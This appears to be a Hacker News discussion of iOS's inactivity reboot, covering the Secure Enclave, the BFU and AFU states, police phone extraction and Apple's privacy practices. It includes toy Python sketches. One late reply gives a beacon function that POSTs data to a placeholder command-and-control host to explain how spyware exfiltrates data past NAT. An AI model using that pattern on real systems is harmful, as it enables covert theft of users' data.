If I were looking for low-hanging fruit, I suspect it wouldn't reboot if you were to replicate the user's home WiFi environment in the Faraday cage, sans internet connection of course. It could be as simple as playing a video continuously.
Great writeup, but I wonder why so much emphasis is put on the 'not connected to a network' part. A timed inactivity reboot seems like a simpler idea than any kind of inter-device communication scheme. It's not new, either: GrapheneOS has had this for a while now, and the default is 18 hours (you can set it as low as 10 minutes), which would be a lot more effective as a countermeasure against data exfiltration tools.
This is because earlier reports coming out of law enforcement agencies suggested that the network was involved in making even older devices reboot. This blog post is an effort to debunk that claim.
If you're up against these evidence-grabbing/device-exploiting mobs, generally the phones get locked into a Faraday cage to drop the mobile network, so that they can't receive a remote wipe request from iCloud.
Two questions:
1. surely unconditionally rebooting locked iPhones every 3 days would cause issues in certain legit use cases?
2. If I read the article correctly, it reboots to re-enter "Before First Unlock" state for security. Why can't it just go into this state without rebooting?
Bonus question: my Android phone asks for my passcode (it won't unlock with fingerprint or face) if it thinks it might have been left unattended (a few hours without moving, etc.), just like after a reboot. Is that different from the "Before First Unlock" state? (I understand Android's "Before First Unlock" state could be fundamentally different from the iPhone's to begin with.)
> 1. surely unconditionally rebooting locked iPhones every 3 days would cause issues in certain legit use cases?
I wonder if this explains why the older iPhone I keep mounted to my monitor for use as a webcam so often refuses to work as a webcam lately and needs me to unlock it with my password...
Great writeup! And it's good to see Apple pushing the envelope on device security.
Does anyone have insight into why Apple encrypts SEP firmware? Clearly it's not critical to their security model, so maybe it's just for IP protection?
They have a long history of encrypting firmware. iBoot only recently stopped shipping encrypted, with the launch of PCC, and prior to iOS 10 the kernel was encrypted too.
The operating theory is that higher management at Apple sees this as a layer of protection. However, word on the street is that members of actual security teams at Apple want it to be unencrypted for the sake of research/openness.
iOS security is mostly about protecting IP for app publishers and media companies. macOS is being pushed the same way.
User privacy and security are to some degree along for the ride: IP security pays the bills, while user privacy gives staff some warm fuzzies and gives Apple some market differentiation. It's not all for show/IP protection, though. Apple told the US government to fuck off in a terrorist investigation, and told the FBI to fuck off about wanting a backdoor. They have made a lot of choices where they clearly took a more complicated or difficult way to get something done because it was more privacy-respecting for the user. For example, the way iPhones query the WiFi location database: the phone asks for a large block of WiFi APs and then searches that block on-device, instead of what Google used to do, which was to feed them a list of MAC addresses and get a location back.
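To make that difference concrete, here's a minimal sketch of the two query patterns in Python. Everything in it (the helper callables, the prefix-query idea) is an illustrative assumption, not either company's actual API:

```python
# Toy illustration of the two lookup patterns described above; the
# helpers (fetch_block, server_lookup) are hypothetical stand-ins.

def centroid(points):
    lats, lons = zip(*points)
    return (sum(lats) / len(lats), sum(lons) / len(lons))

# Privacy-preserving pattern: ask for a large block of access points,
# then match the ones the device actually sees locally. The server
# never learns which specific APs are nearby.
def locate_on_device(visible_aps, fetch_block):
    block = fetch_block(visible_aps[0][:8])  # coarse query, e.g. by BSSID prefix
    hits = [block[b] for b in visible_aps if b in block]
    return centroid(hits) if hits else None

# Revealing pattern: send the exact list of visible APs and get a
# location back, so the server learns where the device is.
def locate_on_server(visible_aps, server_lookup):
    return server_lookup(visible_aps)
```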
Also, on an iPhone, you can disable things like contributing to traffic data, along with a slew of other location-based functionality, even stuff that affects system functions...and Apple won't punish you for it. You can stop contributing traffic data and still get traffic data from Apple. By and large, the only functionality you lose is whatever intrinsically needed the location data you shut off. Google has consistently done the opposite: they hold you over a barrel and say "if you're not going to feed us data, we're not going to give you any, and we're going to yank this entire chunk of functionality", even though the device itself is constantly collecting data for them, most of it of little or no benefit to you.
The major thing Apple does that is similar to Google's attitude: Apple petulantly declares that if you're going to disable the Signed System Volume (the incredibly complex and so-far-unbroken mechanism by which Apple keeps the OS secure from modification)...well gosh, that means someone could haxzor your Gibson and steal unencrypted data off your FileVault-encrypted volume!
So...you are...forced...to...drumroll please...disable FileVault on the user volume. Because someone might be able to steal data from an encrypted volume via malware, Apple forces you to make it nearly trivial to steal all your data.
This fuckwitted, mouth-breathing stupidity is unbelievable: punishing users who want to modify hardware they own by reducing their device security to near zero, because they did something that made their computer a bit less secure. It could be set up so that you modify the volume and then re-sign it in some capacity (a self-signed cert, or a password-protected signing key)...but nope, can't have that!
It's still better than Google, though. Google's interest in privacy is almost entirely because they want to monopolize user tracking data. I don't think they've ever really put their heart into selling media, so they just want to keep everybody else from using your device to collect data and spy on you.
Thank you for such a great writeup; this is an excellent breakdown!
I suspected this was being managed in the Secure Enclave.
That means it's going to be extremely difficult to disable this even if iOS is fully compromised.
If I’m reading this right:
Reboot is not enforced by the SEP, though, only requested. It’s a kernel module, which means if a kernel exploit is found, this could be stopped.
However, considering Apple's excellent track record on this kind of security measure, I would not at all be surprised to find out that a next-generation iPhone has the SEP force a reboot without the kernel's involvement.
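As a toy model of that trust boundary (every name below is invented; this is not how iOS actually implements the feature): a reboot that is merely requested of the kernel can be ignored by a kernel-level attacker, while a SEP that could assert the reset line itself could not be overruled.

```python
# Toy model of the trust boundary discussed above. All names and
# structure are invented for illustration, not Apple's implementation.

INACTIVITY_LIMIT = 3 * 24 * 3600  # three days, in seconds

class Kernel:
    def __init__(self, compromised=False):
        self.compromised = compromised

    def handle_reboot_request(self):
        # A kernel exploit can simply patch out or ignore the request.
        return "ignored" if self.compromised else "rebooted"

class SEP:
    def __init__(self, kernel, last_unlock=0):
        self.kernel = kernel
        self.last_unlock = last_unlock

    def tick(self, now, can_assert_reset=False):
        if now - self.last_unlock < INACTIVITY_LIMIT:
            return "idle"
        if can_assert_reset:
            # Hypothetical stronger design: the SEP drives the reset
            # line directly, so a compromised kernel never gets a say.
            return "hardware reset"
        return self.kernel.handle_reboot_request()

sep = SEP(Kernel(compromised=True))
print(sep.tick(now=4 * 24 * 3600))                         # ignored
print(sep.tick(now=4 * 24 * 3600, can_assert_reset=True))  # hardware reset
```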
What this does is reduce the window of time (to three days) between when an iOS device is captured and when a usable* kernel exploit is deployed against it.
* There is almost certainly a known kernel exploit out in the wild, but the agencies that have it generally reserve using it until they really need to, or it's patched. If you have a captured phone from, say, a low-stakes insurance fraud case, it's not at all worth revealing your ownership of a kernel exploit.
Once an exploit is "burned", it gets distributed to agencies and all affected devices are unlocked at once. This now means that kernel exploits must be deployed within three days, and that's going to preserve the privacy of a lot of people.
Kernel exploits would let someone bypass the lockscreen and access all the data they want immediately, unless I'm missing something. Why would you even need to disable the reboot timer in this case?
Would be nice if Apple would expose an option to set the timer to a shorter window, but still great work.
You can do this yourself with the Shortcuts app.
Create an automation that runs on the time interval you choose with a Shut Down action, and change Shut Down to Restart.
You clearly haven't tried it or even googled it, because it's impossible to do unattended. A dialog pops up (and only when the phone is unlocked) asking you to confirm the reboot. It's probably because they were worried users might end up in a constant reboot/shutdown loop, though presumably they could just implement an "if rebooted in the last hour by a script, don't allow it again" rule.
In GrapheneOS, you can set it to as little as 10 minutes, with the default being 18 hours. That would be a lot more effective for this type of data exfiltration scenario.
Or to disable it entirely. Someone could set up an iPad to do something while always plugged in; it would be bloody annoying to have it locked cold every three days.
I'm not sure, but I wouldn't expect the inactivity timeout to trigger if the device was already in an unlocked state (if I understand the feature correctly), so in kiosk mode, or with auto screen lock turned off and an app open, I wouldn't expect it to happen.
I'd rather have a dedicated Kiosk mode that has a profile of allow-listed applications and one or more that are auto-started.
Maybe one or two of these will do what you want?
https://support.apple.com/en-us/105121
> With Screen Time, you can turn on Content & Privacy Restrictions to manage content, apps, and settings on your child's device. You can also restrict explicit content, purchases and downloads, and changes to privacy settings.
https://support.apple.com/en-us/111795
> Guided Access limits your device to a single app and lets you control which features are available.
Or "single-app mode", which is a more tightly focused kiosk mode:
https://support.apple.com/guide/apple-configurator-mac/start...
Conspiracy theory time! Apple puts this out there to break iPad-based DIY home control panels because they're about to release a product that would compete with them.
> Apple puts this out there to break iPad-based DIY home control panels
If you were using an iPad as a home control panel, you'd probably disable the passcode on it entirely - and I believe that'd disable the inactivity reboot as well.
It’s more likely than you think!
> Apple's Next Device Is an AI Wall Tablet for Home Control, Siri and Video Calls
https://news.ycombinator.com/item?id=42119559
via
> Apple's Tim Cook Has Ways to Cope with the Looming Trump Tariffs
https://news.ycombinator.com/item?id=42168808
> * There is almost certainly a known kernel exploit out in the wild, but the agencies that have it generally reserve using it until they really need to, or it's patched.
There are literally emails from police investigators spreading word about the reboots, which state that the device goes from a state where they can extract data (AFU) to one where they can't get anything out of it (BFU).
It's a bit pointless, IMHO. All cops will do is make sure they have a search warrant lined up so AFU extraction can start right away, or submit warrant requests with urgent/emergency status.
> Reboot is not enforced by the SEP, though, only requested. It’s a kernel module, which means if a kernel exploit is found, this could be stopped.
True. I wonder if they've considered having the SEP take a more active role in filesystem decryption. If the kernel had to be reauthenticated periodically (think OAuth's refresh token), maybe the SEP could stop data exfiltration after the expiry even without a reboot.
Maybe it would be too much of a bottleneck; interesting to think about though.
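A minimal sketch of that refresh-token idea, with entirely made-up interfaces (the real SEP exposes nothing like this): the SEP hands the kernel a short-lived lease on key-unwrapping and simply stops servicing requests once the lease lapses, halting further decryption without a reboot.

```python
# Sketch of the refresh-token idea from the comment above. All of
# this is hypothetical; it is not the real SEP/kernel protocol.

import time

LEASE_SECONDS = 300  # kernel must re-authenticate every 5 minutes

class SEPKeystore:
    def __init__(self):
        self._lease_expiry = 0.0

    def renew_lease(self, kernel_attestation_ok, now):
        # The SEP re-checks the kernel before extending the lease; a
        # kernel that can no longer attest cleanly stops getting keys.
        if kernel_attestation_ok:
            self._lease_expiry = now + LEASE_SECONDS
            return True
        return False

    def unwrap_file_key(self, wrapped_key, now):
        # After expiry the SEP refuses key-unwrap requests entirely,
        # which stalls decryption (and exfiltration) without a reboot.
        if now > self._lease_expiry:
            return None
        return wrapped_key  # stand-in for the real unwrap operation

ks = SEPKeystore()
ks.renew_lease(kernel_attestation_ok=True, now=time.time())
assert ks.unwrap_file_key(b"...", now=time.time()) is not None
assert ks.unwrap_file_key(b"...", now=time.time() + 600) is None
```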
> Reboot is not enforced by the SEP, though, only requested
We (the public) do not know whether the SEP can control nRST of the main cores, but there is no reason to suspect that it cannot.
How do these things work with devices behind a NAT gateway? Most of our devices are inside a LAN; even if a server gets started on the device, it won't be visible to the outside world unless we play with the modem settings.
Now, a hacker/state who has penetrated a device can upload data from the local device to a C&C server.
But that seems risky, since you'd need to do it again and again. Or do they just get into your device once and upload everything to the C&C?
This particular feature doesn’t rely on network connectivity or lack thereof.
Here’s some info about how some spyware works:
https://www.kaspersky.com/blog/commercial-spyware/50813/
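On the NAT question: NAT only blocks unsolicited inbound connections. Spyware doesn't wait for inbound connections; it initiates outbound ones, exactly like a web browser does, and those traverse NAT fine. A minimal sketch of that beacon pattern (the hostname is a placeholder, not a real endpoint):

```python
# The infected device initiates the connection, just like a browser,
# so NAT and most home routers allow it. The reply can carry new
# commands, so each outbound beacon doubles as a command channel,
# which answers the "again and again" concern.
# "c2.example.invalid" is a placeholder, not a real endpoint.

import urllib.request

def beacon(payload: bytes) -> bytes:
    req = urllib.request.Request(
        "https://c2.example.invalid/upload",  # outbound HTTPS
        data=payload,
        method="POST",
    )
    with urllib.request.urlopen(req) as resp:
        return resp.read()
```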
Tell me you didn't read the article, but a little harder.